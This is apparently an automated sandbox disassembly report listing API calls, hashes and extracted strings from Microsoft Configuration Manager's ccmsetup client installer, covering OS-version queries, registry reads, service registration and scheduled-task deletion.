                                                                                            • Part of subcall function 0060BC69: GetCurrentThreadId.KERNEL32 ref: 0060BD34
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B2C87
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B2CE8
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B2D49
                                                                                          • GetComputerNameW.KERNEL32(?,00000010), ref: 005B2D6A
                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,000000E4,005968DA,?), ref: 005B2D74
                                                                                          • GetSystemMetrics.USER32(00000059), ref: 005B2E4D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3$H_prolog3_catchH_prolog3_catch_$ComputerErrorLastMetricsNameSystem
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$5.2$Caption$CheckAndLogOSInformation$CheckAndLogOSInformation failed with 0x%x$Client OS (%s). Service Pack (%d.%d)$OSType$ServicePackMajorVersion$ServicePackMinorVersion$SuiteMask$This is Windows Server 2003 R2.$Version$WBEM_NO_ERROR == spEnum.Next(&spObject)$[%s] Running on '%s' (%s). Service Pack (%d.%d). SuiteMask = %d. Product Type = %d$root\cimv2$select * from Win32_OperatingSystem$spCimV2.Open(szCimV2)$spCimV2.Query(szQuery, &spEnum)$spObject.GetDword(L"OSType", dwType)$spObject.GetDword(L"ServicePackMajorVersion", dwSPMajor)$spObject.GetDword(L"ServicePackMinorVersion", dwSPMinor)$spObject.GetDword(L"SuiteMask", dwSuite)$spObject.GetString(L"Caption", sOSCaption)$spObject.GetString(L"Version", sOSVersion)$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp$m
                                                                                          • API String ID: 2778888534-3825638199
                                                                                          • Opcode ID: 624dcce0227587d46f3ce678aacc30acd0b324247e3e73de65fd82d54af90c23
                                                                                          • Instruction ID: 1e0b097ef497495fa2860b8a13922075bc9f3bc9b20754f3285d1a45a4f07d2d
                                                                                          • Opcode Fuzzy Hash: 624dcce0227587d46f3ce678aacc30acd0b324247e3e73de65fd82d54af90c23
                                                                                          • Instruction Fuzzy Hash: 5AF18070E41368AEDB20EB90CD46BEE7F7ABB15B44F104096F509BB2C1D7B15A84CB61

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0060B3E8
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060B44A
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060B4A1
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060B4DA
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060B54D
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060B5BC
                                                                                          • VariantClear.OLEAUT32(?), ref: 0060B5D0
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060B601
                                                                                          • SystemTimeToVariantTime.OLEAUT32(00000078,00000000), ref: 0060B622
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060B655
                                                                                          • _swscanf.LIBCMT ref: 0060B6D8
                                                                                          • VariantClear.OLEAUT32(?), ref: 0060B6E1
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060B716
                                                                                          • _swscanf.LIBCMT ref: 0060B74D
                                                                                            • Part of subcall function 0066C9E8: _vscan_fn.LIBCMT ref: 0066C9FC
                                                                                          • VariantClear.OLEAUT32(?), ref: 0060B756
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060B78B
                                                                                          • VariantChangeType.OLEAUT32(?,?,00000000,00000000), ref: 0060B7B8
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060B7F1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$Variant$Clear$Time_swscanf$ChangeH_prolog3_catch_SystemType_vscan_fn
                                                                                          • String ID: %I64d$%I64u$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$CCM::Utility::Wmi::Object::Get$CIMTimeToSystemTime(pvValue->bstrVal, &SystemTime)$SystemTimeToVariantTime(&SystemTime, &pvValue->date)$VariantChangeType( pvValue, pvValue, uFlags, vtResultType )$VariantClear(pvValue)$VariantClear(pvValue)$VariantClear(pvValue)$e$getPointer()->Get( BString(pszName), 0, pvValue, &ctPropType, 0 )$null() == false$pszName != 0$pvValue != 0
                                                                                          • API String ID: 2801586293-3046096493
                                                                                          • Opcode ID: 9e8ca537f7b4c798198519c6b0c9f7ebef9e7b43e053e1a597c1d174aa3b7005
                                                                                          • Instruction ID: db509c90831ad0a0d9637732f0212d3308e60d09084c0c21e60699f978f8a63e
                                                                                          • Opcode Fuzzy Hash: 9e8ca537f7b4c798198519c6b0c9f7ebef9e7b43e053e1a597c1d174aa3b7005
                                                                                          • Instruction Fuzzy Hash: 77B102B1AC0344BACB249F60CC46EFE7BA6AF58B11F14E106FD04B73C2C7A559068B65

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005F9554
                                                                                            • Part of subcall function 006013B4: __EH_prolog3.LIBCMT ref: 006013BB
                                                                                            • Part of subcall function 005B14FC: __EH_prolog3.LIBCMT ref: 005B1503
                                                                                            • Part of subcall function 0060B178: __EH_prolog3.LIBCMT ref: 0060B17F
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 00603360: __EH_prolog3_catch_GS.LIBCMT ref: 00603367
                                                                                            • Part of subcall function 00603360: GetCurrentThreadId.KERNEL32 ref: 006033F8
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F95F8
                                                                                            • Part of subcall function 005F646B: __EH_prolog3_catch_GS.LIBCMT ref: 005F6472
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F966A
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F96B9
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F970B
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F975D
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F97AD
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F9848
                                                                                            • Part of subcall function 0060BC69: __EH_prolog3_catch.LIBCMT ref: 0060BC70
                                                                                            • Part of subcall function 0060BC69: GetCurrentThreadId.KERNEL32 ref: 0060BCCC
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F98A5
                                                                                            • Part of subcall function 0060BC69: GetCurrentThreadId.KERNEL32 ref: 0060BD34
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F9902
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F995F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3$H_prolog3_catch_$H_prolog3_catch
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$CCM::Utility::CcmGetOSVersionEx$OSProductSuite$ProductType$ServicePackMajorVersion$ServicePackMinorVersion$Version$WBEM_NO_ERROR == spEnum.Next(&spObject)$root\cimv2$sVersion.tokenize(L".", saTokens)$saTokens.size() >= 3$select * from Win32_OperatingSystem$spObject.GetDword(c_szWmi_OSProductSuite, dwTemp)$spObject.GetDword(c_szWmi_ProductType, dwTemp)$spObject.GetDword(c_szWmi_SPMajorVersion, dwTemp)$spObject.GetDword(c_szWmi_SPMinorVersion, dwTemp)$spObject.GetString( c_szWmi_Version, sVersion )$spWin32NS.Open(L"root\\cimv2")$spWin32NS.Query(c_szWmi_Win32OS_Query, &spEnum)
                                                                                          • API String ID: 3275092694-2116823972
                                                                                          • Opcode ID: 7881fbcef15334c7ebb0cbb65846dc19c68b60691cb41700fd1184aac20e490c
                                                                                          • Instruction ID: f7213359bdd7eb607a1b2270c45136774eadb014ef3f1632821051983e1b288e
                                                                                          • Opcode Fuzzy Hash: 7881fbcef15334c7ebb0cbb65846dc19c68b60691cb41700fd1184aac20e490c
                                                                                          • Instruction Fuzzy Hash: 30C1D3B0D407A8ABCB11EFA4DD49EEE7F79BF91B04F144009F504AB292CB785905CBA1

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005F99FF
                                                                                          • RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\CCM,00000000,00020019,?,CCM::Utility::CcmGetProfilerInstance,0000006C,005F0A5A,00000000,00000000,00000000,00000180,005F14A6,ConnectedStandby,00000000,?), ref: 005F9AD5
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F9B0F
                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 005F9F21
                                                                                          • FreeLibrary.KERNEL32(?), ref: 005F9F33
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseCurrentFreeH_prolog3_catch_LibraryOpenThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$CCM::Utility::CcmGetProfilerInstance$CCM::Utility::GetCcmDirectory(sCcmPath)$CcmProfiler.dll$EnableProfiling$GetCcmProfiler$RegOpenKeyExW((( HKEY ) (ULONG_PTR)((LONG)0x80000002) ), c_szRegKey_Root, 0, ((((0x00020000L)) | (0x0001) | (0x0008) | (0x0010)) &$RegQueryValueExW(hKey, L"EnableProfiling", 0, &uType, (LPBYTE)&dwEnabled, &uSize)$Software\Microsoft\CCM$dwEnabled > 0$dwErr$hModule != 0$hrq$lpfuncGetCcmProfiler(ppProfiler)
                                                                                          • API String ID: 2023098677-3267404283

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0059DAB4
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0059DB24
                                                                                            • Part of subcall function 005B25A8: __EH_prolog3_catch_GS.LIBCMT ref: 005B25B2
                                                                                            • Part of subcall function 005B25A8: CertOpenStore.CRYPT32(0000000A,00000000,00000000,00020000,Root), ref: 005B261E
                                                                                            • Part of subcall function 005B25A8: GetLastError.KERNEL32(?,?,?,?,?,?,?,00000090,0059DAEF,CcmSetup::WinMain,00000048), ref: 005B262F
                                                                                            • Part of subcall function 005B25A8: GetCurrentThreadId.KERNEL32 ref: 005B2664
                                                                                            • Part of subcall function 005B25A8: CertFreeCertificateContext.CRYPT32(00000000,00000000), ref: 005B28F1
                                                                                            • Part of subcall function 005B25A8: CertCloseStore.CRYPT32(?,00000000), ref: 005B2900
                                                                                            • Part of subcall function 005B25A8: CoTaskMemFree.OLE32(00000000,00000000), ref: 005B290F
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0059DC15
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0059DCBF
                                                                                            • Part of subcall function 0057E6BD: __EH_prolog3_catch_GS.LIBCMT ref: 0057E6C4
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0059DD0A
                                                                                            • Part of subcall function 0059892F: __EH_prolog3_catch_GS.LIBCMT ref: 00598939
                                                                                            • Part of subcall function 0059892F: OpenSCManagerW.ADVAPI32(00000000,00000000,10000000,CcmSetup::RegisterService,00000130,0058EBD4,?,?,00000001), ref: 0059898F
                                                                                            • Part of subcall function 0059892F: GetLastError.KERNEL32(?,?,00000001), ref: 005989AB
                                                                                            • Part of subcall function 0059892F: GetCurrentThreadId.KERNEL32 ref: 005989E3
                                                                                            • Part of subcall function 0059892F: CloseServiceHandle.ADVAPI32(?), ref: 005994DF
                                                                                            • Part of subcall function 0059892F: CloseServiceHandle.ADVAPI32(?), ref: 005994F5
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0059DDE2
                                                                                            • Part of subcall function 005BAEFA: __EH_prolog3_catch_GS.LIBCMT ref: 005BAF01
                                                                                            • Part of subcall function 005BAEFA: GetCurrentThreadId.KERNEL32 ref: 005BAF80
                                                                                            • Part of subcall function 0059892F: GetCurrentThreadId.KERNEL32 ref: 00598B83
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0059DE2D
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0059DE89
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0059DF19
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0059DF68
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch_$CertClose$ErrorFreeHandleLastOpenServiceStore$CertificateContextManagerTask
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$.log$About to take action %d$CcmSetup::WinMain$DeleteManifest()$DownloadCcmsetup()$DownloadCcmsetup()$PrepareForRun(bContinue)$Reached %d max failure retry count.$RegisterService(false, true)$RegisterService(false, true)$RegisterService(true, m_bAutoStartService)$RunStandalone()$UninstallRelatedProducts( c_szClientUpgradeCode, m_sMsiUninstallLogFile.length() > 0 ? m_sMsiUninstallLogFile : m_sMsiLogFile, (m_$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp${252DA259-82CA-4177-B8D0-49C78937BA3E}
                                                                                          • API String ID: 4282791920-3063312842

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0058B6B7
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCommandLineW.KERNEL32(CcmSetup::GetSetupCommandLine), ref: 0058B741
                                                                                          • CommandLineToArgvW.SHELL32(00000000,?), ref: 0058B755
                                                                                          • GetLastError.KERNEL32 ref: 0058B767
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058B7A0
                                                                                            • Part of subcall function 00586AC2: __EH_prolog3_catch_GS.LIBCMT ref: 00586ACC
                                                                                            • Part of subcall function 00586AC2: GetCurrentThreadId.KERNEL32 ref: 00586BB2
                                                                                            • Part of subcall function 005A234D: __EH_prolog3_catch_GS.LIBCMT ref: 005A2357
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058BD99
                                                                                          • LocalFree.KERNEL32(00000000,00000001,00000001,00000000,00000001,00000000,/UpgradeWithServer:,/remediate:,/evaluate:,00000001,00000000,?,?,?,?,?), ref: 0058BF17
                                                                                          • CommandLineToArgvW.SHELL32(?,?), ref: 0058BF30
                                                                                            • Part of subcall function 00592624: GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                          • GetLastError.KERNEL32(?), ref: 0058BF5D
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058BF99
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$CommandH_prolog3_catch_Line$ArgvErrorLast$FreeH_prolog3Local
                                                                                          • String ID: "%s" %s$"%s" %s %s$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$/OSUpgradeRepair$/UpgradeWithServer:$/evaluate:$/log:$/remediate:$CcmSetup::GetSetupCommandLine$Ccmsetup command line: %s$Command line parameters for ccmsetup have been specified. No registry lookup for command line parameters is required.$Command line: %s$Failed to get ccmsetup params from registry$GetCcmsetupParams(sParams)$Loaded command line: %s$all$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$client$g_pSetupEnv->ParseAutoUpgradeCommandLine(sCurrentCommandLine, sCommandLine)$prereqs$pszaArgs != 0$pszaArgs = CommandLineToArgvW(szCommandLine, &uNumArgs)$sValue.tokenize(c_szOption_Separator, m_arrRepairPreReqs)
                                                                                          • API String ID: 502516922-1079772330

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00607BD4
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • PathIsRelativeW.SHLWAPI(?,CCM::Utility::Filesystem::Path::Create), ref: 00607C44
                                                                                          • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00607C97
                                                                                          • GetLastError.KERNEL32 ref: 00607CA1
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00607CDE
                                                                                          • PathCombineW.SHLWAPI(?,?,?), ref: 00607CFF
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00607D38
                                                                                          • PathCanonicalizeW.SHLWAPI(?,?), ref: 00607DB7
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00607DF0
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00607F5A
                                                                                          Strings
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00607D94
                                                                                          • ..\path.cpp, xrefs: 00607F62
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00607F55
                                                                                          • !Directory::Exists(sNormalizedPath), xrefs: 00607EA2
                                                                                          • ..\path.cpp, xrefs: 00607D28
                                                                                          • ::GetCurrentDirectoryW((sizeof(szCurrentDirectory)/sizeof(szCurrentDirectory[0])), szCurrentDirectory), xrefs: 00607CD4
                                                                                          • ..\path.cpp, xrefs: 00607E56
                                                                                          • ..\path.cpp, xrefs: 00607DFC
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00607E49
                                                                                          • Path::Normalize( szFullPath, sNormalizedPath ), xrefs: 00607E44
                                                                                          • ..\path.cpp, xrefs: 00607DA5
                                                                                          • ..\path.cpp, xrefs: 00607CCE
                                                                                          • ..\path.cpp, xrefs: 00607E3E
                                                                                          • ..\path.cpp, xrefs: 00607E9C
                                                                                          • ..\path.cpp, xrefs: 00607EB4
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00607EA7
                                                                                          • ::PathCombineW(szCombinedPath, szCurrentDirectory, pszPath) != 0, xrefs: 00607D2E
                                                                                          • ..\path.cpp, xrefs: 00607EFA
                                                                                          • ..\path.cpp, xrefs: 00607D44
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00607D33
                                                                                          • RecursiveCreatePath( sNormalizedPath, psa ), xrefs: 00607F00
                                                                                          • pszPath && pszPath[0], xrefs: 00607F50
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00607CD9
                                                                                          • ::PathCanonicalizeW(szFullPath, pszPath), xrefs: 00607DE6
                                                                                          • ..\path.cpp, xrefs: 00607F12
                                                                                          • CCM::Utility::Filesystem::Path::Create, xrefs: 00607C11
                                                                                          • ..\path.cpp, xrefs: 00607CE6
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00607F05
                                                                                          • ::PathCanonicalizeW(szFullPath, szCombinedPath), xrefs: 00607D8F
                                                                                          • ..\path.cpp, xrefs: 00607F4A
                                                                                          • ..\path.cpp, xrefs: 00607DE0
                                                                                          • ..\path.cpp, xrefs: 00607D89
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00607DEB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: Current$Thread$Path$CanonicalizeCombineDirectoryErrorH_prolog3H_prolog3_catch_LastRelative

                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005C86F7
                                                                                            • Part of subcall function 006093A0: __EH_prolog3.LIBCMT ref: 006093A7
                                                                                          • CoCreateInstance.OLE32(007033E8,00000000,00000017,006EED28,?,DeleteWinSchedTask,000000BC,005C73F2,?,Microsoft\Microsoft\Configuration Manager,CreateWinSchedTaskNew,?,Microsoft\Configuration Manager,S-1-5-18), ref: 005C879B
                                                                                          • CoCreateInstance.OLE32(007033C8,00000000,00000017,006EECF8,?), ref: 005C8806
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005C8837
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005C88CC
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005C89D3
                                                                                            • Part of subcall function 006092A8: __EH_prolog3.LIBCMT ref: 006092AF
                                                                                            • Part of subcall function 00609305: __EH_prolog3.LIBCMT ref: 0060930C
                                                                                            • Part of subcall function 00609305: SysFreeString.OLEAUT32(000000FF), ref: 00609321
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005C8A88
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005C8B3D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3$CreateInstance$FreeH_prolog3_catchString
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$4n$DeleteWinSchedTask$Failed to create CLSID_CTaskScheduler instance (0x%08X).$Failed to create Windows Task Scheduler instance. Error 0x%08x$Failed to delete task '%s'. Error 0x%x$Folder '%s' not found. Task does not exist.$ITaskFolder::DeleteTask('%s') failed with 0x%x$ITaskScheduler::Delete('%s') failed with 0x%x$ITaskService::Connect failed with 0x%08x$ITaskService::GetFolder failed with 0x%x$Successfully deleted task '%s'$Successfully deleted task '%s'$Task '%s' does not exist$\n$ln$spTaskSched.createInstance(CLSID_CTaskScheduler)$spTaskService->Connect(vEmpty, vEmpty, vEmpty, vEmpty)$wintask.cpp$wintask.cpp$wintask.cpp$wintask.cpp$wintask.cpp$wintask.cpp$wintask.cpp$wintask.cpp$wintask.cpp$wintask.cpp$n$n$n$n

                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0061FEC0
                                                                                            • Part of subcall function 006013B4: __EH_prolog3.LIBCMT ref: 006013BB
                                                                                            • Part of subcall function 0060B178: __EH_prolog3.LIBCMT ref: 0060B17F
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0061FFF7
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006200D1
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0062013B
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006201CC
